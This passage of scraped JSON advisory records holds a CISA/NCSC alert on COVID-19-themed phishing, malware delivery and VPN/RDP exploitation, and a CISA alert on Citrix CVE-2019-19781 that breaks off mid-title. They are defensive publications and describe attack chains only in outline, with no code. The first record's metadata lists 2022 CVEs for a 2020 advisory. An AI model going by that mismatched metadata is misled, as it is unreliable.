Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n![](/sites/default/files/2020-04/covid-19_joint_alert_figure_1_0.png)\n\n##### Figure 1: UK government-themed SMS phishing\n\n![](/sites/default/files/2020-04/covid-19_joint_alert_figure_2.png)\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \"EMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\" malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \"TrickBot\" malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n![](/sites/default/files/2020-04/covid-19_joint_alert_figure_3.png)\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as Trickbot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [A20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Futures\u2019 report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus Threats_](<https://www.domaintools.com/resources/blog/free-covid-19-threat-list-domain-risk-assessments-for-coronavirus-threats>)\n * GitHub list of [IOCs used COVID-19-related cyberattack campaigns](<https://github.com/parthdmaniar/coronavirus-covid-19-SARS-CoV-2-IoCs>) gathered by GitHub user Parth D. Maniar\n * GitHub list of [Malware, spam, and phishing IOCs that involve the use of COVID-19 or coronavirus](<https://github.com/sophoslabs/covid-iocs>) gathered by SophosLabs\n * Reddit master thread to collect [intelligence relevant to COVID-19 malicious cyber threat actor campaigns](<https://www.reddit.com\\\\r\\\\blueteamsec\\\\comments\\\\fiy0i8\\\\master_thread_covid19corona_threat_actor_campaigns\\\\>)\n * Tweet regarding the MISP project\u2019s dedicated [#COVID2019 MISP instance](<https://twitter.com/MISPProject/status/1239864641993551873>) to share COVID-related cyber threat information\n\n### Mitigations\n\nMalicious cyber actors are continually adjusting their tactics to take advantage of new situations, and the COVID-19 pandemic is no exception. Malicious cyber actors are using the high appetite for COVID-19-related information as an opportunity to deliver malware and ransomware, and to steal user credentials. Individuals and organizations should remain vigilant. For information regarding the COVID-19 pandemic, use trusted resources, such as the Centers for Disease Control and Prevention (CDC)\u2019s [COVID-19 Situation Summary](<https://www.cdc.gov/coronavirus/2019-ncov/cases-updates/summary.html?CDC_AA_refVal=https%3A%2F%2Fwww.cdc.gov%2Fcoronavirus%2F2019-ncov%2Fsummary.html>).\n\nFollowing the CISA and NCSC advice set out below will help mitigate the risk to individuals and organizations from malicious cyber activity related to both COVID-19 and other themes:\n\n * [CISA guidance for defending against COVID-19 cyber scams](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/defending-against-covid-19-cyber-scams>)\n * [CISA Insights: Risk Management for Novel Coronavirus (COVID-19)](<https://www.cisa.gov/sites/default/files/publications/20_0318_cisa_insights_coronavirus.pdf>), which provides guidance for executives regarding physical, supply chain, and cybersecurity issues related to COVID-19\n * [CISA Alert: Enterprise VPN Security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>)\n * [CISA webpage providing a repository of the agency\u2019s COVID-19 guidance](<https://www.cisa.gov/coronavirus>)\n * [NCSC guidance to help spot, understand, and deal with suspicious messages and emails](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>)\n * [NCSC phishing guidance for organizations and cyber security professionals](<https://www.ncsc.gov.uk/guidance/phishing>)\n * [NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n * [NCSC guidance on home working](<https://www.ncsc.gov.uk/guidance/home-working>)\n * [NCSC guidance on end user device security](<https://www.ncsc.gov.uk/collection/end-user-device-security/eud-overview/vpns>)\n\n## Phishing guidance for individuals\n\nThe NCSC\u2019s [suspicious email guidance](<https://www.ncsc.gov.uk/guidance/suspicious-email-actions>) explains what to do if you've already clicked on a potentially malicious email, attachment, or link. It provides advice on who to contact if your account or device has been compromised and some of the mitigation steps you can take, such as changing your passwords. It also offers NCSC's top tips for spotting a phishing email:\n\n * **Authority **\u2013 Is the sender claiming to be from someone official (e.g., your bank or doctor, a lawyer, a government agency)? Criminals often pretend to be important people or organizations to trick you into doing what they want.\n * **Urgency **\u2013 Are you told you have a limited time to respond (e.g., in 24 hours or immediately)? Criminals often threaten you with fines or other negative consequences.\n * **Emotion **\u2013 Does the message make you panic, fearful, hopeful, or curious? Criminals often use threatening language, make false claims of support, or attempt to tease you into wanting to find out more.\n * **Scarcity **\u2013 Is the message offering something in short supply (e.g., concert tickets, money, or a cure for medical conditions)? Fear of missing out on a good deal or opportunity can make you respond quickly.\n\n## Phishing guidance for organizations and cybersecurity professionals\n\nOrganizational defenses against phishing often rely exclusively on users being able to spot phishing emails. However, organizations that widen their defenses to include more technical measures can improve resilience against phishing attacks.\n\nIn addition to educating users on defending against these attacks, organizations should consider NCSC\u2019s guidance that splits mitigations into four layers, on which to build defenses:\n\n 1. Make it difficult for attackers to reach your users.\n 2. Help users identify and report suspected phishing emails (see CISA Tips, [Using Caution with Email Attachments](<https://www.us-cert.gov/ncas/tips/ST04-010>) and [Avoiding Social Engineering and Phishing Scams](<https://www.us-cert.gov/ncas/tips/ST04-014>)).\n 3. Protect your organization from the effects of undetected phishing emails.\n 4. Respond quickly to incidents.\n\nCISA and NCSC also recommend organizations plan for a percentage of phishing attacks to be successful. Planning for these incidents will help minimize the damage caused.\n\n## Communications platforms guidance for individuals and organizations\n\nDue to COVID-19, an increasing number of individuals and organizations are turning to communications platforms\u2014such as Zoom and Microsoft Teams\u2014 for online meetings. In turn, malicious cyber actors are hijacking online meetings that are not secured with passwords or that use unpatched software.\n\n**Tips for defending against online meeting hijacking** (Source: [FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>), FBI press release, March 30, 2020):\n\n * Do not make meetings public. Instead, require a meeting password or use the waiting room feature and control the admittance of guests.\n * Do not share a link to a meeting on an unrestricted publicly available social media post. Provide the link directly to specific people.\n * Manage screensharing options. Change screensharing to \u201cHost Only.\u201d\n * Ensure users are using the updated version of remote access/meeting applications.\n * Ensure telework policies address requirements for physical and information security.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CovidLock ransomware exploits coronavirus with malicious Android app. TechRepublic.com. March 17, 2020.](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n\n[[2] TrickBot Malware Targets Italy in Fake WHO Coronavirus Emails. Bleeping Computer. March 6, 2020.](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\n[[3] Maze Ransomware Continues to Hit Healthcare Units amid Coronavirus (COVID-19) Outbreak. Security Boulevard. March 19, 2020.](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>)\n\n[[4] Spanish hospitals targeted with coronavirus-themed phishing lures in Netwalker ransomware attacks. Computing.co.uk. March 24, 2020.](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>)\n\n[[5] COVID-19 Testing Center Hit By Cyberattack. Bleeping Computer. March 14, 2020.](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>)\n\n[[6] CISA Tip: Protecting Against Malicious Code](<https://www.us-cert.gov/ncas/tips/ST18-271>)\n\n[[7] CISA Ransomware webpage](<https://www.us-cert.gov/Ransomware>)\n\n[[8] NCSC Guidance: Mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>)\n\n[[9] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[10] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[11] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[12] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n[[13] COVID-19 Impact: Cyber Criminals Target Zoom Domains. Check Point blog. March 30, 2020.](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>)\n\n[[14] FBI Press Release: FBI Warns of Teleconferencing and Online Classroom Hijacking During COVID-19 Pandemic](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\n[[15] Microsoft Security blog: Human-operated ransomware attacks: A preventable disaster. March 5, 2020. ](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>)\n\n[[16] Reposify blog: 127% increase in exposed RDPs due to surge in remote work. March 30. 2020.](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>)\n\n[[17] CISA Tip: Securing Network Infrastructure Devices](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nApril 8, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-08T12:00:00", "type": "ics", "title": "COVID-19 Exploited by Malicious Cyber Actors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-04-08T12:00:00", "id": "AA20-099A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-099a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:48:50", "description": "### Summary\n\n_Note: As of January 24, 2020, Citrix has released all expected updates in response to CVE-2019-19781._[[1]](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\nOn January 19, 2020, Citrix released firmware updates for Citrix Application Delivery Controller (ADC) and Citrix Gateway versions 11.1 and 12.0. \nOn January 22, 2020, Citrix released security updates for vulnerable SD-WAN WANOP appliances. \nOn January 23, 2020, Citrix released firmware updates for Citrix ADC and Gateway versions 12.1 and 13.0. \nOn January 24, 2020, Citrix released firmware updates for Citrix ADC and Gateway version 10.5.\n\nA remote, unauthenticated attacker could exploit CVE-2019-19781 to perform arbitrary code execution.[[2]](<https://support.citrix.com/article/CTX267027>) This vulnerability has been detected in exploits in the wild.[[3]](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\nThe Cybersecurity and Infrastructure Agency (CISA) strongly recommends that all users and administrators upgrade their vulnerable appliances as soon as possible.\n\n#### Timeline of Specific Events\n\n * December 17, 2019 \u2013 Citrix released Security Bulletin CTX267027 with mitigations steps.\n * January 8, 2020 \u2013 The CERT Coordination Center (CERT/CC) released Vulnerability Note VU#619785: Citrix Application Delivery Controller and Citrix Gateway Web Server Vulnerability,[[4]](<https://www.kb.cert.org/vuls/id/619785/>) and CISA releases a Current Activity entry.[[5]](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n * January 10, 2020 \u2013 The National Security Agency (NSA) released a Cybersecurity Advisory on CVE-2019-19781.[[6]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * January 11, 2020 \u2013 Citrix released blog post on CVE-2019-19781 with timeline for fixes.[[7]](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n * January 13, 2020 \u2013 CISA released a Current Activity entry describing their utility that enables users and administrators to test whether their Citrix ADC and Citrix Gateway firmware is susceptible to the CVE-2019-19781 vulnerability.[[8]](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n * January 16, 2020 \u2013 Citrix announced that Citrix SD-WAN WANOP appliance is also vulnerable to CVE-2019-19781.\n * January 19, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 and blog post on accelerated schedule for fixes.[[9]](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * January 22, 2020 \u2013 Citrix released security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3.[[10]](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * January 22, 2020 \u2013 Citrix and FireEye Mandiant released an indicator of compromise (IOC) scanning tool for CVE-2019-19781.[[11]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n * January 23, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0.[[12]](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * January 24, 2020 \u2013 Citrix released firmware updates for Citrix ADC and Citrix Gateway version 10.5.\n\n### Technical Details\n\n#### Impact\n\nOn December 17, 2019, Citrix reported vulnerability CVE-2019-19781. A remote, unauthenticated attacker could exploit this vulnerability to perform arbitrary code execution. This vulnerability has been detected in exploits in the wild.\n\nThe vulnerability affects the following appliances:\n\n * Citrix NetScaler ADC and NetScaler Gateway version 10.5 \u2013 all supported builds before 10.5.70.12\n * Citrix ADC and NetScaler Gateway version 11.1 \u2013 all supported builds before 11.1.63.15\n * Citrix ADC and NetScaler Gateway version 12.0 \u2013 all supported builds before 12.0.63.13\n * Citrix ADC and NetScaler Gateway version 12.1 \u2013 all supported builds before 12.1.55.18\n * Citrix ADC and Citrix Gateway version 13.0 \u2013 all supported builds before 13.0.47.24\n * Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO \u2013 all supported software release builds before 10.2.6b and 11.0.3b. (Citrix SD-WAN WANOP is vulnerable because it packages Citrix ADC as a load balancer).\n\n#### Detection Measures\n\nCitrix and FireEye Mandiant released an [IOC scanning tool for CVE-2019-19781](<https://github.com/citrix/ioc-scanner-CVE-2019-19781/>) on January 22, 2020. The tool aids customers with detecting potential IOCs based on known attacks and exploits.[[13]](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\nSee the National Security Agency\u2019s Cybersecurity Advisory on CVE-2019-19781 for other detection measures.[[14]](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\nCISA released a utility that enables users and administrators to detect whether their Citrix ADC and Citrix Gateway firmware is susceptible to CVE-2019-19781.[[15] ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)CISA encourages administrators to visit CISA\u2019s [GitHub page](<https://github.com/cisagov/check-cve-2019-19781>) to download and run the tool.\n\n### Mitigations\n\nCISA strongly recommends users and administrators update Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP as soon as possible.\n\nThe fixed builds can be downloaded from Citrix Downloads pages for [Citrix ADC](<https://www.citrix.com/downloads/citrix-adc/>), [Citrix Gateway](<https://www.citrix.com/downloads/citrix-gateway/>), and [Citrix SD-WAN](<https://www.citrix.com/downloads/citrix-sd-wan/>).\n\nUntil the appropriate update is implemented, users and administrators should apply Citrix\u2019s interim mitigation steps for CVE-2019-19781.[[16]](<https://support.citrix.com/article/CTX267679>) Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).** Note:** these mitigation steps apply to Citrix ADC and SD-WAN WANOP deployments.[[17]](<https://support.citrix.com/article/CTX267027>)\n\nRefer to table 1 for Citrix\u2019s fix schedule.[[18]](<https://support.citrix.com/article/CTX267027>)\n\n**Table 1. Fix schedule for Citrix appliances vulnerable to CVE-2019-19781**\n\n**Vulnerable Appliance** | **Firmware Update** | **Release Date** \n---|---|--- \nCitrix ADC and Citrix Gateway version 10.5 | Refresh Build 10.5.70.12 | January 24, 2020 \nCitrix ADC and Citrix Gateway version 11.1 | Refresh Build 11.1.63.15 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.0 | Refresh Build 12.0.63.13 | January 19, 2020 \nCitrix ADC and Citrix Gateway version 12.1 | Refresh Build 12.1.55.18 | January 23, 2020 \nCitrix ADC and Citrix Gateway version 13.0 | Refresh Build 13.0.47.24 | January 23, 2020 \nCitrix SD-WAN WANOP Release 10.2.6 | Build 10.2.6b | January 22, 2020 \nCitrix SD-WAN WANOP Release 11.0.3 | Build 11.0.3b | January 22, 2020 \n \nAdministrators should review NSA\u2019s [Citrix Advisory](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>) for other mitigations, such as applying the following defense-in-depth strategy:\n\n\u201cConsider deploying a VPN capability using standardized protocols, preferably ones listed on the National Information Assurance Partnership (NIAP) Product Compliant List (PCL), in front of publicly accessible Citrix ADC and Citrix Gateway appliances to require user authentication for the VPN before being able to reach these appliances. Use of a proprietary SSLVPN/TLSVPN is discouraged.\u201d\n\n### References\n\n[[1] Citrix blog: Citrix releases final fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n\n[[2] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[3] United Kingdom National Cyber Secrity Centre (NCSC) Alert: Actors exploiting Citrix products vulnerability ](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[4] CERT/CC Vulnerability Note VU#619785 ](<https://www.kb.cert.org/vuls/id/619785/>)\n\n[[5] CISA Current Activity: Citrix Application Delivery Controller and Citrix Gateway Vulnerability ](<https://www.us-cert.gov/ncas/current-activity/2020/01/08/citrix-application-delivery-controller-and-citrix-gateway>)\n\n[[6] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[7] Citrix blog: Citrix provides update on Citrix ADC, Citrix Gateway vulnerability ](<https://www.citrix.com/blogs/2020/01/11/citrix-provides-update-on-citrix-adc-citrix-gateway-vulnerability/>)\n\n[[8] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[9] Citrix Blog: Vulnerability Update: First permanent fixes available, timeline accelerated ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n\n[[10] Citrix Blog: Update on CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n\n[[11] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[12] Citrix Blog: Fixes now available for Citrix ADC, Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n\n[[13] Citrix Blog: Citrix and FireEye Mandiant share forensic tool for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>)\n\n[[14] NSA Cybersecurity Advisory: Mitigate CVE-2019-19781: Critical Vulnerability in Citrix Application Delivery Controller (ADC) and Citrix Gateway ](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n\n[[15] CISA Current Activity: CISA Releases Test for Citrix ADC and Gateway Vulnerability GitHub: CISAgov \u2013 check-cve-2019-19781 ](<https://www.us-cert.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>)\n\n[[16] Citrix Security Bulletin CTX267679, Mitigation Steps for CVE-2019-19781 ](<https://support.citrix.com/article/CTX267679>)\n\n[[17] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n[[18] Citrix Security Bulletin CTX267027, Vulnerability in Citrix Application Delivery Controller and Citrix Gateway ](<https://support.citrix.com/article/CTX267027>)\n\n### Revisions\n\nJanuary 20, 2020: Initial Version|January 23, 2020: Updated with information about Citrix releasing fixes for SD-WAN WANOP appliances and an IOC scanning tool|January 24, 2020: Updated with information about Citrix releasing fixes for Citrix ADC and Gateway versions 10.5, 12.1, and 13.0|January 27, 2020: Updated vulnernable versions of ADC and Gateway version 10.5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-21T12:00:00", "type": "ics", "title": "Critical Vulnerability in 